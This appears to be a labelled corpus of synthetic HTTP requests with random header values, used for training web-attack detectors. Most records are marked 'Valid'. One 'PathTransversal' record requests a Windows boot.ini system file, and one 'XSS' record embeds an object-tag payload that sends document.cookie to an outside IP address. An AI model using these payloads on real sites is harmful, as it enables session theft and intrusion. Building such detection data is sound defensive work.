If-Unmodified-Since: Tue, 30 Nov 04 22:28:36 GMT
If-Match: *
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: "qU@ge.7zRiFICkqb"
Max-Forwards: 53
MIME-Version: 3.6
Pragma: uren=hno
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: 8eieo Eeeho=udaw
Range: 51016-,-10087
Referer: /lioi/org9ioa/ep4up.shtml
TE: trailers
Trailer: Host
User-Agent: folwh/4.9.6.3
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: lhs/2.4 219.3.219.129, FTP/5.2 www.ieelaIns.jpg, 3.6 www.ahue7hth.html
Transfer-Encoding: 0SnIee; ouft77op=xnh6xor
Upgrade: jweie/8.4
Warning: 528 www.upne0nt.css "aiL0woeteemwnh" "Sat, 27 Sep 08 17:37:43 UTC"
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45070
Start - Id: 12306
class: Valid
GET /ervrhLMd/nnetcat6YV/mgqO.Sw3cGYG9niajDUe/sp2a/w2L2Qk/nAhhss1dete/hmbSc7ZJzLc1-/lyyelYas/rMoDd/eKZod4@FWz8_QBlOek/he6st.css?sSatjnwOtDdhpNr=8R&zht6trwudhhted=body%3Dt+%3C&J7sDopen5X=%5DoenOnese&qSLD9nAY=+lef82sstdinL4%3Eht2&dtoemo9ikoRns=21&icppnsto=rDdcvSE&tuvFCf=lttiearqm HTTP/1.1
Host: www.2tzi.org
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: atds=n
Client-ip: 49.9.133.115
Cookie: fdFijsena=n5taJ;bcH5.=lnanaalse;nph=myyi
Cookie2: $Version="74"
Date: Wed, 17 Jun 09 13:00:42 CET
ETag: W/".4_8cM79Co-@CLIomZX"
Expect: 100-continue
From: iman0m@blrqt7ti.gov
If-Modified-Since: Wed, 15 Aug 07 02:09:44 UTC
If-Unmodified-Since: Sun, 30 May 04 04:20:45 UTC
If-Match: "9Wl3@iHOGK1YAv-08X@"
If-None-Match: "9uT_@2x2G09RFU1hW5"
If-Range: Fri, 30 Dec 05 21:02:42 UTC
Max-Forwards: 365
MIME-Version: 2.7
Pragma: tt=IhRoae
Proxy-Authorization: Basic ZWZoSHAyYzpkbjh5ZTh5eA==
Authorization: Digest nonce
Range: 825826-,0906-,1304-02
Referer: /0hoio/lsrr4mh/tkyee/odet.gz
TE: trailers
Trailer: Host
User-Agent: 7aeEsi/2.3.2.9.9
UA-CPU: 68000
UA-Disp: 1340,7925,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4392x5610
Via: 5.7 www.o7na.gif, 4.5 www.oaeo.png, 5soee/1.2 200.32.167.157
Transfer-Encoding: compress
Upgrade: lwuepe/6.4, pao/4.1
Warning: 542 www.ouhyte.jpeg "Gsrfo4dsrHenieOoa" 
X-Forwarded-For: 197.212.170.255
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12306
Start - Id: 1059
class: Valid
GET /bmetaPQzXcy/i_Uubs5@btvgSDUtp_.msf?KRCggE4Xinprocessing-instruction=xml HTTP/1.0
Host: www.rentwl.gov
Connection: Doata
Accept: audio/*, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: min-fresh=857
Client-ip: 50.94.142.13
Cookie: pitw3eih=611669162;uduemetrchesi=ifY2envv5X0q
Cookie2: $Version="40"
Date: Sun, 17 Aug 08 12:08:34 CET
ETag: "s4jB_nyoPZKVpmgwAX"
Expect: 100-continue
From: lSpom@es6vknOma.biz
If-Modified-Since: Fri, 08 Sep 06 07:37:41 UTC
If-Unmodified-Since: Sun, 15 Aug 04 13:38:32 GMT
If-Match: "md8_DeRSJ-@bkZL"
If-None-Match: "rpv@72ujd31.RDm"
If-Range: *
Max-Forwards: 23
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aXRyZXNkbzRvcnhyY2VleXR0ZW1ybnNhRXplbnphaTdSNW9SYWVpYmVuNg==
Authorization: Digest nonce
Range: 46238-
Referer: http://www.alrv.st/waeadia.doc
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: emoArTasOxtorsssYei
UA-CPU: MIPS
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5208x202
Via: 0.3 192.65.87.51, 2.1 www.efeksh.jpg, HTTP/3.5 173.58.216.130
Transfer-Encoding: gzip
Upgrade: mie/3.2, kgma/1.7, oli/9.3, oyl/8.2
Warning: 193 www.rtlgaoe.html "hooiiessaotooale" "Fri, 01 Sep 06 09:10:44 CET"
X-Forwarded-For: 65.243.221.166
X-Serial-Number: 3135796940
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1059
Start - Id: 23011
class: Valid
GET /fHUnwSCV0b6Eraf/selectiBl/ltia/tOOExPV4Ha4VO/funFid/esm6RAjsa/lttrtvoti/ewdKKmmjONfPHwq2XMBG.shtml?kewG-=0741 HTTP/1.1
Host: 110.225.26.179:80
Connection: 8iPhaf
Accept: text/plain;q=0.4, image/*, image/gif;q=0.5
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.2, identity, deflate;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 83.68.194.74
Cookie: te4cchvobtbagut=Cees;rsdtH=kaoF6fZO;reeSnqrbdhr=0aolboot.ininXlmadusbgza
Cookie2: $Version="29"
Date: Sat, 11 Jun 05 23:11:19 UTC
ETag: "DH4D@c.p46C-WPHgl"
Expect: oulrn=eeb8UweR
From: reCec@atistonN.com
If-Modified-Since: Mon, 09 Jan 06 08:31:56 GMT
If-Unmodified-Since: Sat, 15 Jul 06 13:07:49 CET
If-Match: "JDMYy.TLnWT8qCheQMG"
If-None-Match: *
If-Range: Sun, 24 Jul 05 04:53:28 UTC
Max-Forwards: 7
MIME-Version: 9.3
Pragma: gsivhtlc='lt3'
Proxy-Authorization: Basic bEVFYUx0THQ6ZWVobGVyOA==
Authorization: Digest uri=http://www.4s2dpdh.it/r2o4/XEhnbM/HHnnBne/hoebuc/w8ogkAan.jsp
Range: -04,115705-698
Referer: http://Otn6o.it/gsemaz.asp
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.7 (Windows; U; Win98 4.6; yn-ro; rv:3.4.9) Gecko/55551607
UA-CPU: MIPS
UA-Disp: 8779,521,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 465x0327
Via: e5an/6.9 222.200.211.120:3031, HTTP/9.3 www.orgua.jpeg:17
Transfer-Encoding: compress
Upgrade: 9p2tdD/2.8, aeolon/3.0, ieaa/7.4, clo/8.1
Warning: 590 www.opmscngj.html "lswlRodnknfotDgav" "Wed, 07 Apr 10 19:07:32 GMT"
X-Forwarded-For: 242.37.131.17
X-Serial-Number: 782598520003
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23011
Start - Id: 5452
class: Valid
POST /phpL1htacces7l15kHF-6/Y3n/rbuhbeRfGhr1M_I6Aj/MC08FDHscovg/oeece5Rtbiy5hSnsa.jpg? HTTP/1.0
Content-Length: 10
Content-Language: bnq
Content-Encoding: identity
Content-Location: /Weu6uN/ienemrr/dpnnsta/tsee.nsf
Content-MD5: amRvY2k4ZGFpY3NubWVsag==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Jan 04 05:58:01 UTC
Last-Modified: Wed, 28 Jan 09 11:21:19 GMT
Host: www.oEiie.cz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ioe-gdaeieeg;q=0.8, czmc-wIllau;q=0.0, laVpohrt-omer1t;q=0.0
Cache-Control: max-stale
Client-ip: 153.141.173.142
Cookie: z5ou=eBgddSrDt%pi nnmetaioer;usoeeItwfrRfe=itdvacac0;cao=jxmleew;ElytuK=0R5inhl.;Fo=i7.k4HuJ
Cookie2: $Version="054"
Date: Thu, 18 Dec 08 19:36:55 GMT
ETag: "H3IVWHp0dfQQFb1"
Expect: 100-continue
From: lfd4dhh@vi2Aiorm.st
If-Modified-Since: Thu, 25 Oct 07 19:47:01 UTC
If-Unmodified-Since: Mon, 08 Mar 04 19:18:12 GMT
If-Match: *
If-None-Match: "V1-yTp5hIj5heeV"
If-Range: *
Max-Forwards: 0172
MIME-Version: 2.8
Pragma: es=smdie3a
Proxy-Authorization: Digest response="d2FB16AdF8542191FCf959b23cfAeb86"
Authorization: t2sace wacH=2yqea9sn
Range: 84-,-306723
Referer: /lotonrn/6Audetp7/epi6/eficf2/1tm2r.doc
TE: gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/0.9 (Windows; U; Win 9x 6.5; Nh-ma; rv:1.3.1) Gecko/78730164
UA-CPU: PowerPC
UA-Disp: 7113,056,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3880x676
Via: HTTP/2.2 143.144.223.31:54, 5.6 www.mdMniot.js
Transfer-Encoding: compress
Upgrade: lrti/1.4, dbuoej/6.6
Warning: 198 www.earWees.jpg "iai98tpeegtl0r" "Sat, 12 Aug 06 14:50:22 CET"
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 271742499076885
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fer4=0nciA

End - Id: 5452
Start - Id: 45838
class: PathTransversal
GET /Etq/cCS/7glvh/tSE@yHoguMxtV/cjq/u8OEQ/er2ta/irelrugyotbeenp.mspx?nlghMe=osluDYRgXt7O&diehZnh1=52469&os=o4emx&or=h%3A%5Cwinnt%5Cboot.ini&iacbmrHopm=vVeHUdnfy&btinoma=fCbaSSf67Cv&5t9U1DfioK=3bgNutIt&xodno=neyRt&hid=2%3Emgcmdj&iz8ne=oexterm%28a03%27pi5lrgdl&txafaflb66a=60859725&oyeaoc=307&hTr1fstdoh=f%40LQ7T&eeosttsscahsy=ar+%3Do&lahdaxbmHS=sbfdtrtkr3 HTTP/1.0
Host: www.djsSjnst9.org
Connection: close
Accept: application/postscript, audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: ig-l8nes, jyHunca6-agfwttn
Cache-Control: no-transform
Client-ip: 103.226.207.78
Cookie: Vgtmptpwety=enyiEAx2fe;meseLbhlrF1g=02106;aPax= ezea'lEc&a$e
Cookie2: $Version="84"
Date: Tue, 20 Jun 06 24:00:32 UTC
ETag: "pcuOXffDgOU2k3R9Y"
Expect: tons32
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Thu, 15 Sep 05 05:10:13 UTC
If-Match: "ziEfDRGDlKnB.7Xb_W"
If-None-Match: "zXW-D.D90nzMt8qQ"
If-Range: *
Max-Forwards: 768
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic b3llM2loamk6dGUzb3Rhcw==
Range: 321-0
Referer: /woiursst/tea4A.shtml
TE: gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 4.5; wr-n2; rv:8.4.6) Gecko/03601780
UA-CPU: x86
UA-Disp: 7854,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 861x425
Via: 9.8 245.231.3.126, 7.5 www.asb3t.jpg:55428
Transfer-Encoding: ts0lte
Upgrade: idie/5.7, dunk/6.1, sib/2.4
Warning: 945 4.66.74.136 "n7nhehqedexmd" "Sat, 22 Aug 09 11:03:47 GMT"
X-Serial-Number: 25397478987579
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45838
Start - Id: 47046
class: XSS
GET /hq4i/aXgX/dFyobjectaTK7/sQ1FPhy1o@s/o1Eazwwgteoylmmexdan/o.A8M/DotwhrjeNE/isQWtWDnA5f2pO2NDJ/gpivl2OOLF2.mspx?auy0emeextaeh=1095209&pchttr=526425&tBcRlteg=72226257&rpc9er=mtEt&bo=uEZuZc0U-&syeierqtee=1&takce=cxe7aileLrSsaon&cphuu=%3Cobject++++classid+++%3D++++%22clsid%3A...++++%22++codebase++++%3D++++%22+javascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F218.143.47.174%2Fniet.php%27%2Bdocument.cookie%29%3B%5D+++%22%3E&PEZ6-5f=uo%26x&optUpwgetwfe=syp61DBZy&teraohr=59894106&st0Mmh0tsqs=399776 HTTP/1.0
Host: www.rTty.cz
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-icelandic;q=0.0, windows-1254, shift_jis
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 67.25.41.239
Cookie: eea2uono=3458358;dLVent=isil tjdbrh0esnieg ];TichT=5;ui7=eqe;xAesafGuhpahc=nss?s0object;8e=o7
Cookie2: $Version="33"
Date: Thu, 09 Feb 06 13:16:19 CET
ETag: "xAjLDL6y7lpFf1FZDT"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Mon, 20 Dec 04 22:30:59 UTC
If-Unmodified-Since: Tue, 29 Aug 06 20:32:36 GMT
If-Match: "pDOI@uzYYd1uzYU3"
If-None-Match: *
If-Range: Sun, 13 Jun 04 21:51:41 GMT
Max-Forwards: 4
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest response="8745DFa2b418762cEBbecDFf1fC62878"
Range: 388869-790680,430-,-04157
Referer: /dotdtA/eitb.php3
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 2.0; vg-oo; rv:5.7.1) Gecko/09982548
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 987x1282
Via: 3.1 130.185.200.45, 8.4 www.y1ssws.htm, 4.9 107.177.178.240
Transfer-Encoding: compress
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 325 www.hiofaai.jpg "t4eneszdrtoed" "Mon, 26 Jul 04 01:19:48 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47046
Start - Id: 33979
class: Valid
POST /Wya6H3ESVU.G/sKXT@@Rz2bVPnj.cfm? HTTP/1.1
Content-Length: 298
Content-Language: iof,rhdls
Content-Encoding: identity
Content-Location: /egivuaj/ano0e1c/ahun.dll
Content-MD5: dW50dG5pZW10aWM0Y2kwbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Apr 06 06:59:09 CET
Last-Modified: Fri, 27 Jan 06 16:05:42 UTC
Host: 36.157.92.240
Connection: rmkv7Da
Accept: application/*;q=0.7, image/png, text/*
Accept-Charset: x-mac-arabic, iso-8859-7;q=0.1, euc-kr;q=0.0, x-mac-chinesetrad;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 17.21.144.90
Cookie: khoLhryeeraE=nosI4N;ri1DfH8m=ocebe2sotci1coW;imitncshai=35;Twk166ahst=shTOl;yosEantLY=tlodb27io
Cookie2: $Version="3"
Date: Fri, 25 Sep 09 03:09:51 CET
ETag: "_a0_64jbSCr6SnLUs"
Expect: 100-continue
From: 2lttn@aSarnOJ.de
If-Modified-Since: Tue, 16 Feb 10 08:02:01 CET
If-Unmodified-Since: Tue, 31 Jan 06 10:05:29 GMT
If-Match: *
If-None-Match: "EfGMSjIZzX_ZY1hAzT"
If-Range: Tue, 08 Mar 05 05:39:30 CET
Max-Forwards: 5
MIME-Version: 6.3
Pragma: uUte='kaf93bh'
Proxy-Authorization: Basic Y3RpbGhiaEU6aWdubHRobVI=
Authorization: Basic aWRhbGNudHQ6bnQ1dWV0ZQ==
Range: 7-987,-0542
Referer: /oypyo/ehs9/cemTcks/lir05wo2/kscj.gif
TE: trailers,gzip;q=0.3,deflate
Trailer: Authorization
User-Agent: jT4GscnF/1.2.9.0.9
UA-CPU: Sparc
UA-Disp: 370,676,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 354x173
Via: waa/7.1 199.148.45.204, ett/9.5 www.823rdb.htm
Transfer-Encoding: deflate
Upgrade: tiy/3.6, xma/2.7, hcenti/3.5
Warning: 702 237.154.44.239:055 "adahlhccmtnRndtt" "Thu, 03 Sep 09 08:04:46 UTC"
X-Forwarded-For: 48.2.222.131
X-Serial-Number: 33226
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

eosi7wndttGTje=T6eAil&ynctoipmsT=lttslfvnfr4a&hsRdleuhro6=%vinlocationfym&a4rxNW=tehritsmerSy&Pxpassthrub96P7=99tt8cso0tr&tnss=+&e7qarhDc=048746010&9TkeIphpnVk=aEpVrFE&rdriwewscm=7FnJnM&pNl9Y=La1esseocesga&ntsDipdoix=ide()>ss1vr&siEPUxoie=-n]&NtNZpL=r$&ezdshhohno=6491522&xep=41278824

End - Id: 33979
Start - Id: 22503
class: Valid
GET /tjtgetmy.php4?rLhaleaeb=iZhb4&029lIx0dTps4X9=jor&q1d8whi=n%24olibf&aezate5e=dnrsenychaleiI&iowe=eeutg&htaOnfefesel=5dneoh%3Fs&Baileonmifian=rg&bErtrmsItedl4=6289&id=u0amU8as+++&nayuy5dPr=lw&h9Th@Gftphjin=autoexecaree0ceiecwherem5F&duiCerossttnns=e3+e&neko0tmekrte=dnooiewnt4uohroez HTTP/1.1
Host: 112.171.198.164
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=13
Client-ip: 1.43.92.227
Cookie: Bae7paeeoiF=774520
Cookie2: $Version="82"
Date: Wed, 11 Aug 04 19:14:31 GMT
ETag: "EVZT3xo1MilfEbacXJ"
Expect: uzxrn
From: htCtf@mttsOtlOi.org
If-Modified-Since: Thu, 06 Jan 05 02:49:42 UTC
If-Unmodified-Since: Sun, 01 Mar 09 05:15:04 GMT
If-Match: *
If-None-Match: "vNIZmX5xZ8_MpfNwhh"
If-Range: Wed, 03 Aug 05 15:45:30 GMT
Max-Forwards: 5
MIME-Version: 2.9
Pragma: 12r=iia0
Proxy-Authorization: NTLM ZU5SdHQ2cmxtZHRERWVFZWViYXI1QUluYVAxSmhvZW1JMGd0
Authorization: NTLM aG95YXhjcjBlZTN0bHdkVGVlaWxyaXNkbXJ3bzNoc1J1YnR1TzdwYw==
Range: 97-403959,415744-,056-023107
Referer: /Ujaht.tar
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.3 (compatible; Konqueror/2.5; Win 9x; gaeheP)
UA-CPU: MIPS
UA-Disp: 3911,9683,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1822x173
Via: HTTP/4.1 229.79.124.25:660, 3.7 www.llbOw.jpg, 6.3 17.78.74.157:2
Transfer-Encoding: gzip
Upgrade: leaHT/8.3, sdhsou/7.9, acol/9.0, ikfFc/4.1, 61ealm/2.2
Warning: 515 www.vdEcm.shtml:048 "6na16YAmltecfI" 
X-Forwarded-For: 227.202.246.94
X-Serial-Number: 122676633400970
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22503
Start - Id: 13740
class: Valid
GET /retbfc/9wuavb5hoisnaaoo/uTWqPC/BBByuV4_Bp_jQI/Hid1wo/2vbscriptinullV/lslfp9asonusd/i0hhc.css? HTTP/1.1
Host: www.ngheEdslt.it:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-greek;q=0.2, windows-1250;q=0.3
Accept-Encoding: deflate, identity;q=0.4
Accept-Language: *;q=0.5
Cache-Control: min-fresh=3906
Client-ip: 209.240.148.137
Cookie: Lttco=846;Fai4fabc0ahiked=ur;6sa=pscin;OKWUQkpdwhereC=4905;oyfeon7c=tHtPAf;shidEy=774486383
Cookie2: $Version="85"
Date: Mon, 25 Jun 07 11:54:49 GMT
ETag: W/"Ex3.kvhko_BjKKUE"
Expect: ASlkpsd=eshntn
From: teeyeaMD@dEis.it
If-Modified-Since: Wed, 06 Sep 06 16:44:42 GMT
If-Unmodified-Since: Sat, 25 Mar 06 09:07:18 GMT
If-Match: "tk_ofJTPjiaQuIaz_zS"
If-None-Match: "mhKwNyV2ie3PbNN8C"
If-Range: Sat, 09 May 09 20:23:19 GMT
Max-Forwards: 815
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.hwae.biz/Gigea5e.php
Authorization: NTLM TFRzenR0dWRjbm1YZUZpT1JtaWR0ZXN1c2F6N2V6c1NzZGdQ
Range: -4
Referer: http://RetiseD3.gov/t6Tl/f5bYt/ohRLidd.dll
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: vd5CJwLBpz http://www.ezojg.be
UA-CPU: PowerPC
UA-Disp: 833,6316,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6985x6776
Via: 8.2 www.ulfke.gif, zos59/6.0 91.76.40.208
Transfer-Encoding: deflate
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 835 27.197.59.199 "stont6nuaoa4ao" "Sat, 17 Jan 09 19:34:32 UTC"
X-Forwarded-For: 170.219.207.191
X-Serial-Number: 6046766144734
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13740
Start - Id: 15897
class: Valid
GET /rtoskty/JlnnCeoapeihzvrt/tyfmailIa7lVMlsxl9/4gnfrne0nf/IEoeleI/lB0NgbS/6Mctlnyi.php?o2ocsasc6nnu=hMAY9l5efD&sysp7ssbcOhs=096 HTTP/1.1
Host: 143.16.234.132
Connection: ioEtnOeh
Accept: */*;q=0.2
Accept-Charset: windows-874;q=0.9, x-mac-icelandic;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: e-yisse;q=0.4, msa-htn;q=0.2, gemifo-dddo;q=0.0, zmmfm-ym, dlnsoc7q-vga;q=0.1
Cache-Control: no-transform
Client-ip: 12.135.89.242
Cookie: xpEne0lyC1mno=(/
Cookie2: $Version="43"
Date: Sun, 06 Apr 08 22:00:17 CET
ETag: "cLNokE9nwyJSqMZC"
Expect: bnwaa=srawoA
From: r8fttR0x@0inhSbroz.ch
If-Modified-Since: Fri, 02 Feb 07 19:12:06 GMT
If-Unmodified-Since: Thu, 14 Jul 05 08:26:34 CET
If-Match: "I.6HsC287vJnnyu"
If-None-Match: "ODS@LJb7dYxUYx4CJx"
If-Range: Wed, 23 Feb 05 12:57:04 GMT
Max-Forwards: 38
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: nogyu eet8g=aNnn
Authorization: Basic b2hubTplY2xxbHc=
Range: 681083-,-6294
Referer: /eouh/aebfo/gtmydhI/yuvy/suae.html
TE: trailers
Trailer: Host
User-Agent: ittv4roh
UA-CPU: PowerPC
UA-Disp: 318,100,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 723x196
Via: nsm/3.0 170.153.225.171
Transfer-Encoding: d6pi
Upgrade: afum9l/8.2, fEaii8/5.9, som/7.2
Warning: 168 www.pbkslL.tiff "cad37ddmsf" "Thu, 31 Jan 08 09:57:52 UTC"
X-Forwarded-For: 185.247.30.17
X-Serial-Number: 495532176106
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15897
Start - Id: 22630
class: Valid
GET /steke/7U/T6WscriptI/wnlsE/drshmtdOuecztonle/9Fjna0G@l/sayhzu-g/tuFWqZzlqW.cgi?pxnasljo1cwane=spM3i&ls=qr91jautasrlt&diqtniiaeResa8=ttsystemat&ms=oamoq0eQoeymM3nreE&8ErbgpdTt=orQJU6%40&wso3etunihgdeaa=treiE&kssdixetEsslA=eo&KscriptWa1dperlOVr=1oz.&sscniKhrrRb3h=dSpgNqCgs HTTP/1.1
Host: 81.4.127.58
Connection: close
Accept: audio/basic;q=0.8, audio/x-wav, image/png;q=0.4
Accept-Charset: iso-8859-1;q=0.3, utf-8
Accept-Encoding: compress;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 68.152.34.49
Cookie: ogyl7remneovm=e;itril~;FiT-ClCDLhbm=092075;K8lod3=ehEabetweennS$@fjdivtelnet;qf7=33074;mea=w=e;inj=elnioobb4nbpg5o
Cookie2: $Version="4"
Date: Fri, 12 Aug 05 06:15:45 GMT
ETag: W/"fAUEqDfrst_zQ@-AT-"
Expect: 100-continue
From: 4tEywso@ngmrMaatec.st
If-Modified-Since: Sat, 20 Oct 07 20:48:14 CET
If-Unmodified-Since: Fri, 20 Jul 07 22:04:37 UTC
If-Match: "2EhRYL33.H88SrI"
If-None-Match: *
If-Range: "G0_bWI@nYCPpwqgq4_K"
Max-Forwards: 0
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic Y2Rudm5zOG46c2JtOWJa
Authorization: Basic SXRlaXR6ZTpjdGlkZQ==
Range: -43745
Referer: http://fe3e.org/Tsrpme/qaec/ndte.tar
TE: trailers,deflate;q=0.2,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 7.5; uv-mI; rv:5.8.2) Gecko/98739873
UA-CPU: Sparc
UA-Disp: 0852,741,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 353x5479
Via: 9.2 www.nhas.tiff, FTP/3.9 www.4ub3bp.tiff, 8.4 139.77.208.57
Transfer-Encoding: esuie; csnj=2Boe
Upgrade: atr/6.0, rel8/5.7, Taa6/8.7, mkeoa4/7.0, osqs/2.3
Warning: 281 www.inNer.css "4tJ3dtF" "Sun, 01 Nov 09 07:54:39 CET"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 705834569346
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22630
Start - Id: 9167
class: Valid
GET /o9l4xnOcR1y7/fYfuD4FMujQ0fx9/o18gfiX/elJ/aAraSmazentmr/edrOURh/3cseeisL/TQFyok/oV/cslelveid/tXediJiUZLS0ysWTS-xp/ol1daao2nIsitD7ds.js?ayTvehtH=mfnco&SVB@S=9715880 HTTP/1.1
Host: www.kmleld.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: othhig-oemt;q=0.8, Sg-h4, ccu-nie;q=0.4, nOstdr-oc, 51u-7r
Cache-Control: only-if-cached
Client-ip: 22.93.175.140
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="237"
Date: Sat, 06 May 06 04:05:07 GMT
ETag: W/"-fmhV-@Ije5xJ9oFP"
Expect: 100-continue
From: fwtTde@tnn0ld58.biz
If-Modified-Since: Sun, 06 Aug 06 07:53:15 CET
If-Unmodified-Since: Mon, 07 Aug 06 16:46:00 CET
If-Match: "op_SLdSNz7XIiGI"
If-None-Match: "Q-@3JcdonPVlQHL"
If-Range: "ZWgLvi5O.kC03pIUTifo"
Max-Forwards: 60
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic ZGlvczp4b2xlZXg=
Authorization: ccien ezres=wwlen
Range: -7586
Referer: /maeqnsg/6riem/cpcsAt.wmn
TE: trailers
Trailer: Referer
User-Agent: siE0wXi http://www.lEMa58sh.biz
UA-CPU: MIPS
UA-Disp: 226,033,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 001x9335
Via: 9.0 97.174.222.66, 9.3 200.45.110.139:96, 0.5 24.229.194.210
Transfer-Encoding: gzip
Upgrade: mapEt/8.1, RNae/5.1
Warning: 905 www.dgfeerSr.html:96082 "t0ewrycrethaeHou7" "Thu, 31 Mar 05 07:13:11 GMT"
X-Forwarded-For: 98.82.13.56
X-Serial-Number: 3795859892
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9167
Start - Id: 10397
class: Valid
GET /2nexpiptenoih1uT0Bf/fphr/7W/oissttdknTeoee/qjuVHGX.cfm?namdosoye=Et&ieepeganx=4224233 HTTP/1.1
Host: www.nweee2I.ch
Connection: oreeAt9
Accept: */*
Accept-Charset: iso-8859-5, cp-950;q=0.1, isiri-3342;q=0.0, cp-950;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: EN-oEibth;q=0.5, nailsh-ulLloAu;q=0.9, tdo-ee, 1ir9g-CYnsa
Cache-Control: max-stale=7
Client-ip: 73.251.141.250
Cookie: styleAbids7C=5472;nmsrEsedntu=passwdeg Ai ;brl0meeyte6=oh4kbyo;SIlezcnraeai=1453066444;dq=01719
Cookie2: $Version="7"
Date: Fri, 15 Dec 06 13:26:38 CET
ETag: W/"YrYs7dYn9ZOwsxUUr3B3"
Expect: hxutl
From: orBxod@ooRislo1t.st
If-Modified-Since: Sat, 17 May 08 21:19:50 GMT
If-Unmodified-Since: Thu, 04 Jun 09 19:50:42 GMT
If-Match: "qJh-bHwCVqwrosMDi"
If-None-Match: "TKoJcQ@Rv1geXZ8"
If-Range: Sat, 04 Sep 04 02:49:02 UTC
